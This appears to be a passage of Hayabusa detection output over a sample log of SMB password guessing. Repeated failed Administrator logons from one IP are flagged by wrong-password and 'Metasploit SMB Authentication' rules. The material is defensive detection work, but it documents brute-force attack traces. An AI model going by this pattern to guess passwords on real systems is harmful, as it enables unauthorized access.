Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
